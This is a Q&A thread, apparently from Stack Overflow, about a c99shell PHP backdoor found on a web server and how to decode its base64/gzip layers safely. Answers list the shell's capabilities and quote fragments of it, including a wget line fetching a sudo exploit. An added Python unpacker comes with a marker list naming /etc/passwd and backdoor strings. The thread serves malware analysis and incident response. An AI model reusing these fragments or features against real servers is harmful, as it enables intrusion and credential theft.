22

WARNING: This is a possible exploit. Do not run directly on your server if you're not sure what to do with this.

http://pastehtml.com/view/1b1m2r6.txt

I believe this was uploaded via an insecure upload script. How do I decode and uncompress this code? Running it in the browser might execute it as a shell script, open up a port or something.

I can do a base64 decode online but I couldn't really decompress it.

AstroCB
HyderA
  • Is it possible for you to paste the code here? I'm not able to open this link.. – jyz Sep 14 '10 at 11:04
  • I'm afraid it's executed yet. :( Btw you can decompress it but do not eval it. – fabrik Sep 14 '10 at 11:05
  • I copied the code off to do some testing, and unbelievably MSE picked it up *on the clipboard cache file*, and directed me to this online virus definition: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Backdoor%3aPHP%2fC99shell.E&threatid=2147621086 – Yi Jiang Sep 14 '10 at 11:31

5 Answers

32

So there's a string. It's gzipped and base64 encoded, and the code decodes the base64 and then uncompresses it.

When that's done, I am left with this:

<? eval(base64_decode('...')); ?>

Another layer of base64, which is 720440 bytes long.

Now, base64 decoding that, we have 506961 bytes of exploit code.

I'm still examining the code, and will update this answer when I have more understanding. The code is huge.

Still reading through the code, and the (very well-done) exploit allows these tools to be exposed to the hacker:

  • TCP backdoor setup
  • unauthorised shell access
  • reading of all htpasswd, htaccess, password and configuration files
  • log wiping
  • MySQL access (read, write)
  • append code to all files matching a name pattern (mass exploit)
  • RFI/LFI scanner
  • UDP flooding
  • kernel information

This is probably a professional PHP-based server-wide exploit toolkit, and seeing as it's got a nice HTML interface and the whole lot, it could be easily used by a pro hacker, or even a script kiddie.

This exploit is called c99shell (thanks Yi Jiang) and it turns out to have been quite popular, being talked about and running for a few years already. There are many results on Google for this exploit.

Delan Azabani
  • Wow, it's a complete backdoor setup. Though the guy who uploaded it is probably another script kiddie. It was hosted directly under our apache root directory. And a real hacker would have deleted it after setting up the backdoor. – HyderA Sep 14 '10 at 11:21
  • It's got a shell script in it, a string called $backdoor, which is written out and exec'd. The PHP then tells the user this has been done and to connect with netcat. –  Sep 14 '10 at 11:23
  • Shit like this scares me `array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),` – HyderA Sep 14 '10 at 11:24
  • @gAMBOOKa only affects sudo 1.6.8. You do regularly update your software, right...?!! `sudo -V` to find out if this affects you. –  Sep 14 '10 at 11:31
  • @Ninefingers : I'm safe! Thanks for the tip. – HyderA Sep 14 '10 at 11:38
  • @Delan if you have access to the shell, can you not just run apt-get/yum? Distros should distribute the latest versions? –  Sep 14 '10 at 12:36
  • `Sudo version 1.6.8p12` am I vulnerable? – jyz Oct 14 '10 at 14:24
16

Looking at Delan's decoded source, it appears to be a full-fledged backdoor providing a web interface that can be used to control the server in various ways. Telling fragments from the source:

echo '<center>Are you sure you want to install an IP:Port proxy on this
website/server?<br />

or

<b>Mass Code Injection:</b><br><br>
Use this to add PHP to the end of every .php page in the directory specified.

or

echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . 
     round(($pakits*65)/1024, 2) . " MB) packets averaging ". 
     round($pakits/$exec_time, 2) . " packets per second \n";

or

if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

I'd advise you to scrub that server and reinstall everything from scratch.

Michael Borgwardt
7

I know Delan Azabani has done this, but just so you actually know how he got the data out:

Just in case you're wondering how to decompress this, use base64 -d filename > output to parse base64 strings and gunzip file.name.gz to parse gzipped data.

The trick is in recognising that what you've got is base64 or gunzip and decompressing the right bits.

This way it goes absolutely nowhere near a JS parser or PHP parser.
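The two answers above describe the same procedure by hand: peel the base64 layer, gunzip it, peel the next base64 layer, and never hand any of it to a PHP or JS interpreter. The script below is an added example of doing exactly that in Python; it is not code from the question, the answers, or the pastebin. It assumes the usual `eval(<gzinflate|gzuncompress|gzdecode>(base64_decode('...')))` dropper shape, maps each PHP decompressor to its matching container format (PHP's `gzinflate` is raw DEFLATE, `gzuncompress` is zlib, `gzdecode` is the gzip format that `gunzip` reads), and runs on a constructed, harmless two-layer sample built inline; the `MARKERS` list is a triage aid taken from the strings quoted in the answers, not a detection signature.

```python
import base64
import gzip
import re
import zlib

# Wrapper chain commonly used by obfuscated PHP droppers:
#   eval(<gzinflate|gzuncompress|gzdecode>(base64_decode('<blob>')))
# The compression wrapper is optional: the inner layer on the page is plain base64.
PATTERN = re.compile(
    r"(?:(gzinflate|gzuncompress|gzdecode)\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)",
    re.IGNORECASE,
)

def decompress(wrapper, data):
    """Map PHP's three decompressors to their three container formats."""
    if wrapper is None:
        return data
    wrapper = wrapper.lower()
    if wrapper == "gzinflate":      # raw DEFLATE stream, no header
        return zlib.decompress(data, -zlib.MAX_WBITS)
    if wrapper == "gzuncompress":   # zlib-wrapped stream
        return zlib.decompress(data)
    if wrapper == "gzdecode":       # gzip container (what `gunzip` reads)
        return gzip.decompress(data)
    raise ValueError("unknown wrapper: " + wrapper)

def peel(source, max_layers=10):
    """Return every layer from the outer dropper down to the final payload.
    Nothing is executed: each layer is only decoded and searched for the next one."""
    layers = [source]
    for _ in range(max_layers):
        match = PATTERN.search(layers[-1])
        if match is None:
            break
        wrapper, blob = match.group(1), match.group(2)
        raw = base64.b64decode("".join(blob.split()))  # tolerate wrapped base64
        # latin-1 round-trips arbitrary bytes, so binary junk cannot abort the loop
        layers.append(decompress(wrapper, raw).decode("latin-1"))
    return layers

# Strings quoted from the decoded source in the answers above; counting them is a
# quick triage of what the unpacked payload reaches for.
MARKERS = ("/etc/passwd", "UDP Flood", "Mass Code Injection", "backdoor", "eval(")

def triage(payload):
    return {marker: payload.count(marker) for marker in MARKERS}

# Constructed, harmless sample with the same two-layer shape as the pastebin:
# outer layer = base64(gzip(inner dropper)), inner dropper = base64(payload).
INNER = "<?php echo 'constructed harmless payload'; ?>"
LAYER1 = "<? eval(base64_decode('%s')); ?>" % base64.b64encode(INNER.encode()).decode()
SAMPLE = "<?php eval(gzdecode(base64_decode('%s'))); ?>" % base64.b64encode(
    gzip.compress(LAYER1.encode())).decode()

if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE)):
        print("layer %d: %d bytes" % (depth, len(layer)))
    print(triage(peel(SAMPLE)[-1]))
```

To use it on a real sample, read the file into `source` and call `peel(source)`; the last element is the plaintext to inspect, and `triage` on it gives a first idea of what the payload contains before any deeper reading.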

3

First, replace the eval with an echo to see what code it would execute if you'd let it. Send the output of that script to another file, say, test2.php. In that file, do the same trick again. Run it, and it will output the complete malicious program (it's quite a beast), ~4k lines of hacker's delight.

tdammers
2

This is code for a PHP shell. To decode it:

Replace `eval("?>".` with `print(` and run this:

php5 file.php > file2.php

Then replace eval with print and run it in the browser: http://localhost/file2.php

jcubic